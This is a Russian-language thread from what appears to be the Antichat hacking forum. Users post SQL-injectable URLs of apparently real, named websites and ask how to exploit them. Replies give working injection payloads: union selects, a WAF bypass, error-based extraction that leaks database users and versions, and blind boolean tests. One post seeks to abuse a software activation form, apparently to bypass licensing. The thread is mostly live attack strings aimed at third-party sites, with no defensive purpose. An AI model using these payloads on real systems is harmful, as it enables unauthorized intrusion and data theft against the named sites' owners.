ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Здравствуйте, подскажите как можно раскрутить такие скули:

http://www.timesworld24.com/cat-news-details.php?id=%20'+union(sElect+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17)+--+ //без валидного id отдает ошибку sql

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74 // несколько запросов, один из низ update. как раскрутить? order by, как я понял, отпадает

http://www.daviddeltredici.com/worksbycat.php%3Fid=-6+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17+--+ //404 отдает, не mysql?

Заарнее благодарен

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74%27+or%201% 20group%20by%20concat%28user%28%29,floor%28rand%28 0%29*2%29%29%20having%20min%280%29%20or%201+--+

Duplicate entry 'asanbiotech_e@localhost1' for key 1

http://www.timesworld24.com/cat-news-details.php?id=1

Инъекция в числовом параметре

Определим количество столбцов (смотрим низ страницы)

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+7+--+#.UR8NhG-rEhH TRUE

http://www.timesworld24.com/cat-news-details.php?id=1+group+by+8+--+#.UR8NhG-rEhH FALSE

Обходим WAF

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,2,3,4,5,6,7)+--+

Добиваемся вывода

http://www.timesworld24.com/cat-news-details.php?id=1+union(select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7)+--+#.UR8NQW-rEhH

5.5.23-55:timeswor_n2031t2@localhost

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1='1

Инъекция в строковом параметре

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+ 25+--+ TRUE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+group+by+ 26+--+ FALSE

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=2+u nion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,'25#+--+

Данные передаются в UPDATE запрос, а значит финт ушами не прокатит.

Остаётся BLIND

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+1=if( substring((@@version),1,1)=4,1,2)+--+

Ну или более привычный вам

http://asanbiotech.net/sir.php?mode=intro&w=v&sm_id=6&si_id=74'+and+subst ring((@@version),1,1)=4+--+

Есть возможность крутить как Error-Based, но её уже предложили выше.

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27

Инъекция в числовом параметре

Добиваемся вывода

http://www.daviddeltredici.com/worksbycat.php?sort=date&cat=1&id=27+and+1=2+union +select+1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Вобщем суть такая. Есть форма активации одной софтинки. Софтинка при установке привязывается к железу. В форму вводишь ключ который получился от привязки (по типу 45F7EF0456A88B0536633746C986 )

И ключ оплаты который получил на сайте, после оплаты.

Вот собственно форма Активации: _http://worldbik.ru/act.php

В ней два поля. Ковычки и т.п. Фильтруется, однако если в верхнее поле (код оплаты) ввести русские буквы ( в нижнее поле нужно ввести что угодно, чтобы не было пустым.) то вылазит ошибка Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/muwik/worldbik.ru/act.php on line 76

Можно ли как нибудь этим воспользоваться, или кроме раскрытия путей это ничего не даст?

Подскажите, можно отсюда что-нибудь вытащить? Или в каком направлении двигаться?

http://site.ru/index.php?area=viewSale&id=31

class: PostgresDatabaseException

code: 42P01

message: ERROR: 42P01: relation "sale" does not exist - SELECT "sale"."id", "sale"."category_id", "sale"."title", "sale"."created", "sale"."announce", "sale"."content", "sale"."project_id" FROM "sale" WHERE ("sale"."id" = '31')

#0 /var/www/onphp-framework/core/DB/DB.class.php(321): PgSQL->queryRaw('SELECT "sale"."...')

#1 /var/www/onphp-framework/core/DB/PgSQL.class.php(126): DB->query(Object(SelectQuery))

#2 /var/www/onphp-framework/main/DAOs/Workers/BaseDaoWorker.class.php(152): PgSQL->queryRow(Object(SelectQuery))

#3 /var/www/onphp-framework/main/DAOs/Workers/CommonDaoWorker.class.php(53): BaseDaoWorker->cachedFetchObject(Object(SelectQuery), 604800, true)

#4 /var/www/onphp-framework/main/DAOs/Workers/TransparentDaoWorker.class.php(29): CommonDaoWorker->getById(31, 604800)

#5 /var/www/onphp-framework/main/DAOs/GenericDAO.class.php(165): TransparentDaoWorker->getById(31, 3600)

#6 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(144): GenericDAO->getById(31)

#7 /var/www/onphp-framework/core/Form/Primitives/PrimitiveIdentifier.class.php(118): PrimitiveIdentifier->actualImportValue(31)

#8 /var/www/onphp-framework/core/Form/Form.class.php(422): PrimitiveIdentifier->import(Array)

#9 /var/www/onphp-framework/core/Form/Form.class.php(299): Form->importPrimitive(Array, Object(PrimitiveIntegerIdentifier))

#10 /var/www/site.ru/friends/newAwards-msk/user/controllers/viewNews.class.php(22): Form->import(Array)

#11 /var/www/site.ru/library/classes/Flow/PosterSessionFilter.class.php(66): viewNews->handleRequest(Object(HttpRequest))

#12 /var/www/site.ru/friends/newAwards-msk/classes/Flow/ProjectFilter.class.php(29): PosterSessionFilter->handleRequest(Object(HttpRequest))

#13 /var/www/site.ru/friends/newAwards-msk/user/htdocs/index.php(56): ProjectFilter->handleRequest(Object(HttpRequest))

#14 {main}

при запросе

?area=viewSale&id=31'+or+"sale"."id" = '31 или

?area=viewSale&id=31'+or+id = '31 отправляет на главную страницу

Судя по всему - это PostgreSQL.

А значит и инъектировать надо с особенностями этого SQL языка.

http://bilet.aero/news/event?id=4'

плиз...

Duplicate entry '5.0.51a-24+lenny2'

Здравствуйте подскажите можно ли тут что нибудь сделать? http://80.80.220.18/phpinfo.php